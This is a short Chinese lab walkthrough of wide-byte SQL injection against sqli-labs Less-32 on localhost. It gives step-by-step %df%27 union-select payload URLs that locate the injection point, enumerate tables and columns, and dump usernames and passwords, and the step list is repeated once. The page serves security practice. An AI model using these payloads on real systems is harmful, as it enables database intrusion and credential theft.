sql注入之宽字节注入
2018-09-18 14:44
603 查看
宽字节注入的常见过滤函数
2.宽字节注入的条件
3.确定宽字节注入点 http://127.0.0.1/sqli-labs-master/Less-32/?id=1%df%27
http://127.0.0.1/sqli-labs-master/Less-32/?id=1%df%27-- +
确定字符段 http://127.0.0.1/sqli-labs-master/Less-32/?id=1%df%27 order by 3-- +
确定数据库输出的地方
http://127.0.0.1/sqli-labs-master/Less-32/?id=0%df%27 union select 1,2,3-- +
爆出数据库 http://127.0.0.1/sqli-labs-master/Less-32/?id=0%df%27 union select 1,database(),3-- +
查出表名 http://127.0.0.1/sqli-labs-master/Less-32/?id=0%df%27 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3--+
爆出列名 http://127.0.0.1/sqli-labs-master/Less-32/?id=0%df%27 union select 1,(select group_concat(column_name) from information_schema.columns where table_name=0x7573657273),3--+
爆出用户名密码 http://127.0.0.1/sqli-labs-master/Less-32/?id=0%df%27 union select 1,(select group_concat(username,0x7e,password) from users),3--+
2.宽字节注入的条件
3.确定宽字节注入点 http://127.0.0.1/sqli-labs-master/Less-32/?id=1%df%27
http://127.0.0.1/sqli-labs-master/Less-32/?id=1%df%27-- +
确定字符段 http://127.0.0.1/sqli-labs-master/Less-32/?id=1%df%27 order by 3-- +
确定数据库输出的地方
http://127.0.0.1/sqli-labs-master/Less-32/?id=0%df%27 union select 1,2,3-- +
爆出数据库 http://127.0.0.1/sqli-labs-master/Less-32/?id=0%df%27 union select 1,database(),3-- +
查出表名 http://127.0.0.1/sqli-labs-master/Less-32/?id=0%df%27 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3--+
爆出列名 http://127.0.0.1/sqli-labs-master/Less-32/?id=0%df%27 union select 1,(select group_concat(column_name) from information_schema.columns where table_name=0x7573657273),3--+
爆出用户名密码 http://127.0.0.1/sqli-labs-master/Less-32/?id=0%df%27 union select 1,(select group_concat(username,0x7e,password) from users),3--+
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 
相关文章推荐
- SQL注入-宽字节注入
- CTF/CTF练习平台 --SQL注入测试【sql宽字节注入与#,%23】
- SQL注入--宽字节注入
- (学习)SQL注入--宽字节注入
- SQL注入——宽字节注入
- 【PHP代码审计】 那些年我们一起挖掘SQL注入 - 5.全局防护Bypass之宽字节注入
- SQL注入教程——(四)宽字节注入
- 【sql注入教程】mysql注入直接getshell
- 【sql注入】浅谈sql注入中的Post注入
- 利用GBK双字节编码突破PHP单引号转义限制进行SQL注入
- SQL注入不完全思路与防注入程序
- SQL注入天书之ASP注入漏洞全接触
- 注入攻击-SQL注入和代码注入
- SQL注入测试平台 SQLol -5.DELETE注入测试
- SQL注入--代码层注入
- SQL注入防御之二——注入关键词过滤(PHP)
- SQL注入工具常用的一些注入命令
- sqli注入的方法以及可能导致sql注入的地方
- SQL注入--sqlmap自动化注入工具
- SQL注入天书-ASP注入漏洞全接触 (入门篇)